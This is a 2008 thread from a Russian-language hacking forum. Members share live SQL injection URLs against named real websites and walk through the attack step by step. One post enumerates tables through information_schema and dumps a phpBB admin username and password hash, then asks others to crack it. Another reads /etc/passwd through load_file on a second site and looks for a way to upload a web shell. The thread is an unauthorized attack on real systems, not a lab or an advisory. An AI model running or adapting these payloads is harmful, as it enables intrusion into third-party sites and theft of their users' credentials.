11.07.2008, 15:33
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Ну и накурили тут вы =)
BanQui information_table есть только в пятой ветке скуля....
|
|
|
11.07.2008, 15:33
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
Нашел вот енто
http://www.adams-motors.ru/new.php?id=-2+union+select+1,TABLE_NAME,concat(column_name,0x3 a,table_schema)%20FROM%20INFORMATION_SCHEMA.column s+limit+559,1/*
Попыталсо сделать вот так:
http://www.adams-motors.ru/new.php?id=-2+union+select+1,aes_decrypt(aes_encrypt(concat(0x 3a,user_newpasswd),0x71),0x71)%20FROM%20adamsold/*
Нече не выходит!!!
|
|
|
|
11.07.2008, 16:00
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
блин что вы курите...
Вот смотрим версию
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+version(),2,3/*
Ага версия пятая смотрим таблицы
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+table_name,2,3+from+information_schema.tables+limit+1,1/*
находим таблицы вот актуальные
Код:
Action
Akssesuar
Colors
Complekt
Foto
Foto_old
Marks
Menu
Models
Old_avto
People
Texts
Vacancy
accessories
all_details
details
documentation
files
files_up
forum
graphic_people
inner
news
news_details
дальше идут таблицы форума (на движке phpbb)
среди них есть таблица phpbb_users
роем на колонки
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+column_name,2,3+from+information_schema.columns+where+table_name=0x70687062625f7573657273+limit+1,1/*
Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users
находим нужные нам колонки username и user_password и составляем запрос
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+concat_ws(0x3a,username,user_password),2,3+from+phpbb_users+limit+1,1/*
Получаем логин админа и зашифрованый пароль а именно
admin:178f6c2365ac7511b4bf37c8e89cc678
кто расшифрует скиньте пасс в личку плиз.
Вот и все
Последний раз редактировалось Мистерео; 11.07.2008 в 16:03..
|
|
|
|
11.07.2008, 16:16
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Сообщение от Мистерео
блин что вы курите...
Вот смотрим версию
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+version(),2,3/*
Ага версия пятая смотрим таблицы
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+table_name,2,3+from+information_schema.tables+limit+1,1/*
находим таблицы вот актуальные
Код:
Action
Akssesuar
Colors
Complekt
Foto
Foto_old
Marks
Menu
Models
Old_avto
People
Texts
Vacancy
accessories
all_details
details
documentation
files
files_up
forum
graphic_people
inner
news
news_details
дальше идут таблицы форума (на движке phpbb)
среди них есть таблица phpbb_users
роем на колонки
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+column_name,2,3+from+information_schema.columns+where+table_name=0x70687062625f7573657273+limit+1,1/*
Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users
находим нужные нам колонки username и user_password и составляем запрос
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+concat_ws(0x3a,username,user_password),2,3+from+phpbb_users+limit+1,1/*
Получаем логин админа и зашифрованый пароль а именно
admin:178f6c2365ac7511b4bf37c8e89cc678
кто расшифрует скиньте пасс в личку плиз.
Вот и все Ххе...это лежит на xaker.name уже много месяцев...
|
|
|
|
11.07.2008, 18:28
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users
Научите переводить в 16бит!!!
Последний раз редактировалось 2la.painkiller; 11.07.2008 в 18:40..
|
|
|
|
11.07.2008, 19:06
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Последний раз редактировалось ~!DoK_tOR!~; 11.07.2008 в 19:10..
|
|
|
|
11.07.2008, 19:20
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
|
|
|
|
11.07.2008, 16:19
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
дык я человеку выше ее раскрутил
|
|
|
|
11.07.2008, 16:20
|
|
Новичок
Регистрация: 25.06.2008
Сообщений: 1
Провел на форуме:
7710
Репутация:
1
|
|
Неправильно выставленные права мускул юзера позволяют читать (и возможно писать) файлы:
http://ns1.profsurv.com/category_list.php?x_category_id=-1%20union%20select%20load_file(0x2f6574632f7061737 37764)
Не смог найти документрут чтобы залить шелл, кто найдет раскрытие пути или документрут - скиньте в личку, интересно.
Последний раз редактировалось ask-me-how; 11.07.2008 в 16:24..
|
|
|
|
11.07.2008, 18:32
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
http://snak3.h17.ru/tools/ вот там и есть 16 битное шифрование
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?769099){kind=avatar}
Комбинированный вид
